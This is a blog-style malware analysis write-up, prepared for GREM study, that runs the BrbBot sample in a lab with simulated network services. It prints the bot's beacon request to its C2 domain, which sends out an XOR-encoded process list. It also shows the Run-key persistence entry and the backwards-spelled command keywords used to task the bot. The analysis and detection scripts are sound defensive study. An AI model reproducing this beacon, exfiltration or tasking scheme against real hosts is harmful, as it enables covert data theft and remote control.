Monday, January 11, 2021

Continuing Malware Analysis - Dynamic Analysis of BrbBot

This post and all others for this month are part of the series which I used to help me prepare for my GIAC Reverse Engineer Malware (GREM) certification.

In the previous post, we did static analysis of brbbot. In this post, we look at dynamic analysis to gain insight into the program's behaviour. Remember, VirusTotal reported that 52 of 74 engines flagged this file as malicious.

The tools used here are as follows:
- TShark
- InetSim on Kali
- Process Monitor - Windows 10
- Process Hacker - Windows 10
- Process Explorer - Windows 10
- RegShot - Windows 10
- ProcDot

Let's see what the tools above gave us once we executed brbbot.exe on Windows 10 as an administrator.

Looking first at the RegShot comparison summary, we see:

RegShot Comparison Summary

Note that the total changes are not all from running brbbot.exe; some come from other programs that were executed, intentionally or unintentionally, during the same window.

Looking at the report and picking out a few entries of immediate interest: the brbbot value under HKLM\...\CurrentVersion\Run is a persistence mechanism, and it points at a copy of the binary in the user's AppData\Roaming folder rather than the C:\brbbot.exe that was launched. Writing a value under HKLM only succeeded because the sample was run as an administrator; an unprivileged run could not have created that key. The RecentApps and Compatibility Assistant entries are ordinary Windows bookkeeping that records the launch of C:\brbbot.exe.

Created with Regshot 1.9.1 x64 Unicode (beta r321)
Comments:
Datetime: 2020-11-08 20:19:04, 2020-11-08 22:15:15
Computer: SECURITYNIK-WIN, SECURITYNIK-WIN
Username: SecurityNik, SecurityNik


Values added: 
...
 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\brbbot: "C:\Users\SecurityNik\AppData\Roaming\brbbot.exe"
HKU\S-1-5-21-3846991316-327138358-508696823-1002\Software\Microsoft\Windows\CurrentVersion\Search\RecentApps\{A6858C8A-6321-4416-ACF2-A4DF3C4480B4}\AppId: "C:\brbbot.exe"
 HKU\S-1-5-21-3846991316-327138358-508696823-1002\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\brbbot.exe: 53 41 43 50 01 00 00 00 00 00 00 00 07 00 00 00 28 00 00 00 00 28 01 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 0A 73 20 00 00 DB 80 FD AC 28 39 D3 01 00 00 00 00 00 00 00 00
...


Taking a quick look via Process Hacker.


Looking at the General tab.



Peeking at the strings loaded into memory.


Peeking at the modules loaded by brbbot.exe.



Looking at the Handles.




Transitioning to Process Monitor, we see, along with the network connections, that a file named brbconfig.tmp is opened, read and then closed. If you remember, in the static analysis there was a config file in the resource section. Could this be the file being read here?



Transitioning to ProcDot, where a saved copy of the Process Monitor events is fed in as the input file.


Transitioning to the network traffic as seen from the perspective of INetSim and TShark.

Looking first at the INetSim report below, we see a DNS request for brb.3dtuts.by followed by an HTTP GET request for a file named ads.php. The request carries three parameters: i, which appears to be my computer's IP address; c, which appears to be my computer name; and p, a long string of hex characters. Note that i holds 169.254.204.15, a link-local (APIPA) address, while the packets themselves come from 10.0.0.110, so the bot reported a different interface's address than the one it actually used to reach the server.

$ sudo cat /var/log/inetsim/report/report.18951.txt | more
=== Report for session '18951' ===

Real start date            : 2020-11-08 17:11:53
Simulated start date       : 2020-11-08 17:11:53
Time difference on startup : none

...
2020-11-08 17:12:52  DNS connection, type: A, class: IN, requested name: brb.3dtuts.by
2020-11-08 17:12:52  HTTP connection, method: GET, URL: http://brb.3dtuts.by/ads.php?i=169.254.204.15&c=SECURITYNIK-WIN&p=123f373e6008222
82f3e366028362828753e233e603828292828753e233e602c32353235322f753e233e603828292828753e233e602c323537343c3435753e233e60283e292d32383e28753e
233e6037283a2828753e233e60282d383334282f753e233e603d34352f3f292d3334282f753e233e603d34352f3f292d3334282f753e233e60282d383334282f753e233e6
03f2c36753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60
282d383334282f753e233e60282d383334282f753e233e600d193423083e292d32383e753e233e60163e363429227b1834362b293e282832343560282d383334282f753e2
33e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282b343437282d753e233e60282d38333428
2f753e233e60082228363435753e233e60282b372e35303f753e233e60083e382e29322f22133e3a372f33083e292d32383e753e233e60282d383334282f753e233e602e3
5283e383a2b2b753e233e603834353334282f753e233e60282b372e3530762c32353e2d2f37343c753e233e60282d383334282f753e233e60083e3a29383312353f3e233e
29753e233e60282d383334282f753e233e6028323334282f753e233e60282d383334282f753e233e602f3a28303334282f2c753e233e60382f3d363435753e233e603e232
b3734293e29753e233e6008333e37371e232b3e29323e35383e1334282f753e233e60083e3a2938330e12753e233e60092e352f32363e192934303e29753e233e60092e35
2f32363e192934303e29753e233e600830222b3e193a38303c29342e353f1334282f753e233e6016081a08182e3217753e233e600d1934230f293a22753e233e6014353e1
f29322d3e753e233e60133e372b0b3a353e753e233e601a2b2b3732383a2f3234351d293a363e1334282f753e233e600b2934383e2828133a38303e29753e233e602b2934
383e232b6d6f753e233e60092e352f32363e192934303e29753e233e603f37373334282f753e233e6038363f753e233e603834353334282f753e233e600b2934383634357
53e233e600b2934383634356d6f753e233e60093e3c2833342f76236d6f760e353238343f3e753e233e60282d383334282f753e233e600c32293e28333a2930753e233e60
0822282f3e36083e2f2f32353c28753e233e602f3a28303334282f2c753e233e603f37373334282f753e233e603f37373334282f753e233e6039293939342f753e233e, file name: /var/lib/inetsim/http/fakefiles/sample.html

...

Let's get TShark's view of this communication. First, looking at the DNS request and response, we see the query for brb.3dtuts.by.

└─$ tshark -r brbbot.pcap -Y "dns.qry.name == brb.3dtuts.by"
   15 25.543214256   10.0.0.110 → 10.0.0.114   DNS 73 Standard query 0x6a64 A brb.3dtuts.by
   16 25.551623068   10.0.0.114 → 10.0.0.110   DNS 89 Standard query response 0x6a64 A brb.3dtuts.by A 10.0.0.114

Looking at the HTTP traffic, we see below that there are multiple connections. Looking closely at the timestamps, the malware calls home (beacons) every 30 seconds, each time from a new ephemeral source port, which means each beacon is a fresh TCP connection rather than a reused one.

└─$ tshark -r brbbot.pcap -Y "http.host == brb.3dtuts.by" -T fields -e frame.time -e ip.src -e tcp.srcport -e ip.dst -e tcp.dstport -e http.host -E header=y
           frame.time                     ip.src   tcp.srcport  ip.dst     tcp.dstport  http.host
Nov  8, 2020 17:12:52.715732789 EST     10.0.0.110      4081    10.0.0.114      80      brb.3dtuts.by
Nov  8, 2020 17:13:22.745066520 EST     10.0.0.110      4082    10.0.0.114      80      brb.3dtuts.by
Nov  8, 2020 17:13:52.763137491 EST     10.0.0.110      4084    10.0.0.114      80      brb.3dtuts.by
Nov  8, 2020 17:14:22.782289408 EST     10.0.0.110      4086    10.0.0.114      80      brb.3dtuts.by
Nov  8, 2020 17:14:52.826690345 EST     10.0.0.110      4087    10.0.0.114      80      brb.3dtuts.by
Nov  8, 2020 17:15:22.865526674 EST     10.0.0.110      4088    10.0.0.114      80      brb.3dtuts.by
Nov  8, 2020 17:15:52.908439391 EST     10.0.0.110      4089    10.0.0.114      80      brb.3dtuts.by
Nov  8, 2020 17:16:22.928449020 EST     10.0.0.110      4090    10.0.0.114      80      brb.3dtuts.by
Nov  8, 2020 17:16:52.954382147 EST     10.0.0.110      4092    10.0.0.114      80      brb.3dtuts.by
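The regular 30-second gap above is the kind of thing worth checking mechanically rather than by eye. The script below is an added example, not part of the original post: it parses the tshark field output above (copied in as sample input so it runs offline), groups requests by source, destination and Host header, and flags any group whose inter-request gaps are nearly constant. The 0.1 coefficient-of-variation threshold and the minimum of four requests are my own choices, not values from the post.

```python
"""Spot a fixed-interval beacon in tshark field output (added example)."""
import re
import statistics
from collections import defaultdict
from datetime import datetime

# The HTTP request lines from the tshark field output above, copied as
# sample input (header included, as tshark prints it) so the script runs offline.
SAMPLE_LINES = """\
           frame.time                     ip.src   tcp.srcport  ip.dst     tcp.dstport  http.host
Nov  8, 2020 17:12:52.715732789 EST     10.0.0.110      4081    10.0.0.114      80      brb.3dtuts.by
Nov  8, 2020 17:13:22.745066520 EST     10.0.0.110      4082    10.0.0.114      80      brb.3dtuts.by
Nov  8, 2020 17:13:52.763137491 EST     10.0.0.110      4084    10.0.0.114      80      brb.3dtuts.by
Nov  8, 2020 17:14:22.782289408 EST     10.0.0.110      4086    10.0.0.114      80      brb.3dtuts.by
Nov  8, 2020 17:14:52.826690345 EST     10.0.0.110      4087    10.0.0.114      80      brb.3dtuts.by
Nov  8, 2020 17:15:22.865526674 EST     10.0.0.110      4088    10.0.0.114      80      brb.3dtuts.by
Nov  8, 2020 17:15:52.908439391 EST     10.0.0.110      4089    10.0.0.114      80      brb.3dtuts.by
Nov  8, 2020 17:16:22.928449020 EST     10.0.0.110      4090    10.0.0.114      80      brb.3dtuts.by
Nov  8, 2020 17:16:52.954382147 EST     10.0.0.110      4092    10.0.0.114      80      brb.3dtuts.by
""".splitlines()

LINE_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2})\s+(?P<day>\d{1,2}), (?P<year>\d{4}) "
    r"(?P<hms>\d{2}:\d{2}:\d{2})\.(?P<frac>\d+) \S+\s+"
    r"(?P<src>\S+)\s+(?P<sport>\d+)\s+(?P<dst>\S+)\s+(?P<dport>\d+)\s+(?P<host>\S+)\s*$"
)


def parse_line(line):
    """Return (timestamp, src, dst, host) for a data line, None for the header."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(
        "%s %s %s %s" % (m["mon"], m["day"], m["year"], m["hms"]), "%b %d %Y %H:%M:%S")
    # tshark prints nanoseconds; datetime only carries microseconds.
    ts = ts.replace(microsecond=int(m["frac"][:6].ljust(6, "0")))
    return ts, m["src"], m["dst"], m["host"]


def intervals_by_flow(lines):
    """Map (src, dst, host) -> list of gaps in seconds between consecutive requests."""
    times = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            ts, src, dst, host = rec
            times[(src, dst, host)].append(ts)
    result = {}
    for key, ts_list in times.items():
        ts_list.sort()
        result[key] = [(b - a).total_seconds() for a, b in zip(ts_list, ts_list[1:])]
    return result


def find_beacons(lines, min_requests=4, max_cv=0.1):
    """Flag (src, dst, host) triples whose inter-request gaps are nearly constant.

    cv = stdev / mean. A person browsing the same host produces a large cv;
    a Sleep()-driven bot produces a very small one.
    """
    hits = []
    for key, gaps in intervals_by_flow(lines).items():
        if len(gaps) + 1 < min_requests:
            continue
        mean = statistics.mean(gaps)
        stdev = statistics.pstdev(gaps)
        cv = stdev / mean if mean else float("inf")
        if cv <= max_cv:
            hits.append({"src": key[0], "dst": key[1], "host": key[2],
                         "requests": len(gaps) + 1,
                         "mean_s": round(mean, 3), "stdev_s": round(stdev, 3)})
    return hits


if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_LINES):
        print(hit)
```

On the nine requests above the mean gap comes out just over 30.0 s with a standard deviation of roughly 10 ms, which is as periodic as a Sleep(30000) loop gets; it matches the sleep=30000 value recovered from the decrypted configuration later in the post.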

Looking into the session with source port 4081 and destination port 80, we see:

└─$ tshark -r brbbot.pcap -q -z follow,tcp,ascii,10.0.0.110:4081,10.0.0.114:80

===================================================================
Follow: tcp,ascii
Filter: ((ip.src eq 10.0.0.110 and tcp.srcport eq 4081) and (ip.dst eq 10.0.0.114 and tcp.dstport eq 80)) or ((ip.src eq 10.0.0.114 and tcp.srcport eq 80) and (ip.dst eq 10.0.0.110 and tcp.dstport eq 4081))
Node 0: 10.0.0.110:4081
Node 1: 10.0.0.114:80
2148
GET /ads.php?i=169.254.204.15&c=SECURITYNIK-WIN&p=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 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
Host: brb.3dtuts.by
Connection: Close
Cache-Control: no-cache


        150
HTTP/1.1 200 OK
Connection: Close
Content-Type: text/html
Date: Sun, 08 Nov 2020 22:12:52 GMT
Content-Length: 258
Server: INetSim HTTP Server


        258
<html>
  <head>
    <title>INetSim default HTML page</title>
  </head>
  <body>
    <p></p>
    <p align="center">This is the default HTML page for INetSim HTTP server fake mode.</p>
    <p align="center">This file is an HTML document.</p>
  </body>
</html>


Above we see the default INetSim page returned. However, the request was for ads.php, so the bot probably expects something specific in that response. I instead switched to Apache, created a file named ads.php in the Apache document root, and let brbbot.exe fetch it. That worked. Here is the file.

└─$ sudo cat /var/www/html/ads.php
<HTML>
        <TITLE>SecurityNik ads.php</TITLE>
        <BODY>
                Welcome to SecurityNik World!
        </BODY>

</HTML>

When the bot makes the request, we see in the Apache access log that it returned ads.php with a 200 status.

10.0.0.110 - - [08/Nov/2020:22:24:05 -0500] "GET /ads.php?i=169.254.204.15&c=SECURITYNIK-WIN&p=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 HTTP/1.1" 200 292 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"

Stepping back for a second, we saw brbbot.exe create and read a file named brbconfig.tmp. Looking into the file, we see:


The above does not seem helpful in any way. Taking a look via hexdump:



It looks like we will need to decrypt or decode this file. If we remember, during the static analysis phase, we saw cryptographic functions such as:



Setting a breakpoint on the CreateFileA function, we see the first argument is in the RCX register. If I understood the x64 calling convention correctly, it uses the registers RCX, RDX, R8 and R9 for parameters before using the stack. In this case the first parameter of CreateFileA is lpFileName. If I am wrong on this, please correct me if you are reading this.



Now that we know the file is created, let's jump to where it is read by setting another breakpoint, this time on the ReadFile call. Looking at the Microsoft documentation, the first argument to ReadFile is a handle to the device (here, the file). Looking below, we see the handle is 0x108, which can be found in the RCX register.


To confirm that 0x108 is the handle to the brbconfig.tmp file, we look at the handles from a different perspective, this time with Sysinternals handle64.exe.

C:\Tools\SysinternalsSuite>handle64.exe -p brbbot.exe                    
Nthandle v4.11 - Handle viewer  
Copyright (C) 1997-2017 Mark Russinovich 
Sysinternals - www.sysinternals.com 
------------------------------------------------------------------------------ 
brbbot.exe pid: 4164 SECURITYNIK-WIN\SecurityNik
108: File  (R--)   C:\GREM-Malware\Malware\day1\brbconfig.tmp

Above we see handle 0x108 points to the brbconfig.tmp file, so the ReadFile breakpoint caught the bot reading its own configuration.

Scrolling through until I found the CryptDecrypt function, I then set a breakpoint on the instruction directly after the call. CryptDecrypt decrypts in place, so once it returns, the pbData buffer holds the plaintext. This allowed me to see the decrypted content of the brbconfig.tmp file as shown below.


The decrypted configuration looks like:

"uri=ads.php;exec=cexe;file=elif;conf=fnoc;exit=tixe;encode=5b;sleep=30000"

Above we see the URI ads.php that the bot requests, four command keywords (cexe, elif, fnoc and tixe, which are exec, file, conf and exit spelled backwards), an encode value of 5b, and a sleep value of 30000. The sleep value is in milliseconds and matches the 30-second beacon interval seen in the TShark output.

Let's task the bot with the exec command by writing the keyword cexe followed by notepad.exe into our ads.php file and see what we get.

─$ sudo bash -c 'echo -e cexe notepad.exe > /var/www/html/ads.php'
     
─$ sudo cat /var/www/html/ads.php                                 
cexe notepad.exe

Running brbbot.exe again, we see that notepad is being executed roughly every 30 seconds, once per beacon.

PS C:\Users\SecurityNik> Get-Process *notepad* | Select-Object -Property Name,Id,StartTime,ProcessName | Sort-Object -Property StartTime

Name      Id StartTime             ProcessName
----      -- ---------             -----------
notepad 5444 11/9/2020 11:38:58 PM notepad
notepad 3528 11/9/2020 11:39:29 PM notepad
notepad 3856 11/9/2020 11:39:59 PM notepad
notepad 7740 11/9/2020 11:40:29 PM notepad
notepad 5376 11/9/2020 11:40:59 PM notepad
notepad 6984 11/9/2020 11:41:29 PM notepad
notepad 7252 11/9/2020 11:41:59 PM notepad
notepad 7748 11/9/2020 11:42:29 PM notepad
notepad 7176 11/9/2020 11:42:59 PM notepad
notepad 2964 11/9/2020 11:43:29 PM notepad
notepad 3640 11/9/2020 11:43:59 PM notepad
notepad 2280 11/9/2020 11:44:29 PM notepad
notepad 5448 11/9/2020 11:44:59 PM notepad
notepad 8184 11/9/2020 11:45:29 PM notepad
notepad 2112 11/9/2020 11:45:59 PM notepad
notepad 2428 11/9/2020 11:46:29 PM notepad
notepad 3368 11/9/2020 11:46:59 PM notepad
notepad 5036 11/9/2020 11:47:29 PM notepad
notepad 3632 11/9/2020 11:47:59 PM notepad
notepad 2608 11/9/2020 11:48:29 PM notepad
notepad 6372 11/9/2020 11:48:59 PM notepad
notepad 7524 11/9/2020 11:49:29 PM notepad
notepad 6780 11/9/2020 11:49:59 PM notepad
notepad  248 11/9/2020 11:50:29 PM notepad
notepad 7616 11/9/2020 11:50:59 PM notepad
notepad  192 11/9/2020 11:51:29 PM notepad


Taking a view via WMIC, we see:

PS C:\Users\SecurityNik> wmic process where "name like '%notepad%'" get name,processID,ParentProcessID
Name         ParentProcessId  ProcessId
notepad.exe  1596             5444
notepad.exe  1596             3528
notepad.exe  1596             3856
notepad.exe  1596             7740
notepad.exe  1596             5376
notepad.exe  1596             6984
notepad.exe  1596             7252
notepad.exe  1596             7748
notepad.exe  1596             7176
notepad.exe  1596             2964
notepad.exe  1596             3640
notepad.exe  1596             2280
notepad.exe  1596             5448
notepad.exe  1596             8184
notepad.exe  1596             2112
notepad.exe  1596             2428
notepad.exe  1596             3368
notepad.exe  1596             5036
notepad.exe  1596             3632
notepad.exe  1596             2608
notepad.exe  1596             6372
notepad.exe  1596             7524
notepad.exe  1596             6780
notepad.exe  1596             248
notepad.exe  1596             7616
notepad.exe  1596             192
notepad.exe  1596             672

Looking at the parent for those Notepad.exe processes, we see brbbot.exe is the parent with PID 1596.

PS C:\Users\SecurityNik> wmic process where processid="1596" get name,processID,parentProcessID
Name        ParentProcessId  ProcessId
brbbot.exe  4476             1596
 

The final step now is to decode the traffic in the p parameter of the HTTP request above. We saw in the decrypted configuration a value of encode=5b. This 5b is a single-byte XOR key: the bot XORs each byte of the plaintext with 0x5b and then hex-encodes the result, which is why the parameter is pure hex. Decoding therefore takes two steps, undoing the hex layer and then the XOR. I copied the values in the p parameter to a file named p-parameter.txt with everything on one line. Here is what that looks like.

└─$ cat p-parameter.txt 
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

xxd is used next to revert the hex values above to raw binary, as shown below:

└─$ xxd -revert -plain p-parameter.txt > p-parameter.raw

The file p-parameter.raw looks like this. Only the hex layer has been removed, so the bytes are still XOR-encoded and mostly unprintable:

└─$ cat p-parameter.raw           
?7>"(/>6`(6((u>#>`8()((u>#>`,25252/u>#>`8()((u>#>`,2574<45u>#>`(>)-28>(u>#>`7(:((u>#>`(-834(/u>#>`=45/?)-34(/u>#>`=45/?4>)-28>u>#>`>64)"{▒46+)>((245`(-834(/u>#>`(-834(/u>#>`(-834(/u>#>`(-834(/u>#>`(-834(/u>#>`(+447(-u>#>`(-834(/u>#>"(645u>#>`(+7.50?u>#>>8.)2/">:7/>)-28>u>#>`(-834(/u>#>`.5(>8:++u>#>`84534(/u>#>`(+7.50v,25>-/74<u>#>`(-834(/u>#>>:)835?>#>)u>#>`(-834(/u>#>`(234(/u>#>`(-834(/u>#>`/:(034(/,u>#>`8/=645u>#>`>#+74)>)u>#>3>77#+>)2>58>4(/u>#>>:)83u>#>`       .5/26>)4#):"u>#>`5>)2->u>#>`>7+0>)u>#>0"+>:80<)4.5?4(/u>#>▒.2u>#>`
                        :5>u>#>`▒++728:/245):6>4(/u>#>`
                                                       )48>((:80>)u>#>`+)48>#+mou>#>`   .5/26>)40>)u>#>`?7734(/u>#>`86?u>#>`84534(/u>#>`
                 )48645u>#>`
                            )48645mou>#>`       ><(34/v#mov5284?>u>#>`(-834(/u>#>`
                                                                                  2)>(3:)0u>#>"(/>>//25<(u>#>`/:(034(/,u>#>`?7734(/u>#>`?7734(/u>#>`9)994/u>#> 

To decode the p-parameter.raw file, I passed it as input to CyberChef.
 


After decoding, we see that, along with the IP address and computer name, brbbot.exe was also exfiltrating the list of processes running on the host.
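The two manual steps above (reading the configuration, then stripping the hex and XOR layers from the p parameter) can be done in a few lines of Python. The script below is an added example written for this post, not the bot's own code and not the CyberChef recipe the post used. It parses the decrypted configuration string exactly as recovered above, takes the XOR key from its encode field, decodes the first 62 hex characters of the captured p value (truncated here to keep the example short; the full value is in the INetSim report above), and also maps a tasking line such as the cexe notepad.exe served from ads.php back to the command it names. The XOR-then-hex encoding is confirmed by decoding those leading bytes: they come out as "Idle;System;smss.exe;csrss.exe;", the start of a process list. Two things are assumptions of mine rather than facts from the post: that the other keywords (elif, fnoc, tixe) take a single argument after a space the way cexe does, and that unknown keywords should simply be reported as unknown.

```python
"""Decode brbbot's configuration string and beacon payload (added example).

Assumptions (mine, not from the post):
  * encode=5b is a single-byte XOR key; the XOR output is hex-encoded into the
    p= parameter. Checked by hand on the leading bytes of the captured value.
  * Tasking lines are "<keyword> <argument>", as in the post's "cexe notepad.exe".
    The other keywords are assumed to use the same shape.
"""
from urllib.parse import parse_qs, urlsplit

# Decrypted configuration exactly as recovered from brbconfig.tmp in the post.
CONFIG = "uri=ads.php;exec=cexe;file=elif;conf=fnoc;exit=tixe;encode=5b;sleep=30000"

# First 62 hex characters of the p= value from the captured GET request.
SAMPLE_P_HEX = (
    "123f373e600822282f3e366028362828753e233e60"  # Idle;System;smss.exe;
    "3828292828753e233e60"                        # csrss.exe;
)
SAMPLE_URL = ("http://brb.3dtuts.by/ads.php?i=169.254.204.15"
              "&c=SECURITYNIK-WIN&p=" + SAMPLE_P_HEX)


def parse_config(text: str) -> dict:
    """'k=v;k=v;...' -> dict with keys uri, exec, file, conf, exit, encode, sleep."""
    cfg = {}
    for item in text.strip().strip(";").split(";"):
        key, _, value = item.partition("=")
        cfg[key.strip()] = value.strip()
    return cfg


def xor_key(cfg: dict) -> int:
    """The encode field is the XOR key as one hex byte ('5b' -> 0x5b)."""
    return int(cfg["encode"], 16) & 0xFF


def decode_p(hex_text: str, key: int) -> str:
    """Undo both layers: hex -> bytes (what xxd -r -p did), then XOR every byte."""
    raw = bytes.fromhex(hex_text.strip())
    return bytes(b ^ key for b in raw).decode("latin-1")


def encode_p(text: str, key: int) -> str:
    """Inverse of decode_p: what the bot does before building the beacon URL."""
    return bytes(b ^ key for b in text.encode("latin-1")).hex()


def parse_beacon_url(url: str, key: int) -> dict:
    """Split the beacon URL into the reported IP (i), host name (c) and process list (p)."""
    qs = parse_qs(urlsplit(url).query)
    plain = decode_p(qs["p"][0], key)
    return {
        "i": qs["i"][0],
        "c": qs["c"][0],
        "processes": [p for p in plain.split(";") if p],
    }


def interpret_task(line: str, cfg: dict) -> tuple:
    """Map a tasking line such as 'cexe notepad.exe' back to (command, argument).

    The config maps command name -> keyword (exec -> cexe); invert it so the
    keyword in the server response selects the command. Unknown keyword -> 'unknown'.
    """
    keyword_to_cmd = {cfg[name]: name
                      for name in ("exec", "file", "conf", "exit") if name in cfg}
    keyword, _, argument = line.strip().partition(" ")
    return keyword_to_cmd.get(keyword, "unknown"), argument.strip()


if __name__ == "__main__":
    cfg = parse_config(CONFIG)
    key = xor_key(cfg)
    print("beacon every %d s" % (int(cfg["sleep"]) // 1000))
    print("beacon contents:", parse_beacon_url(SAMPLE_URL, key))
    print("task:", interpret_task("cexe notepad.exe", cfg))
```

Because XOR with a fixed byte is its own inverse, encode_p and decode_p are the same operation in opposite directions; the pair is useful both for reading captured beacons and for building a test beacon when writing a detection for this traffic.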

That's all for this post as I believe I achieved the learnings I was required for this malware.

P.S. Not sure if you noticed it. However, I had to run brbbot.exe a few times and thus you might have noticed the PID changed, etc. The concepts still remain the same though.
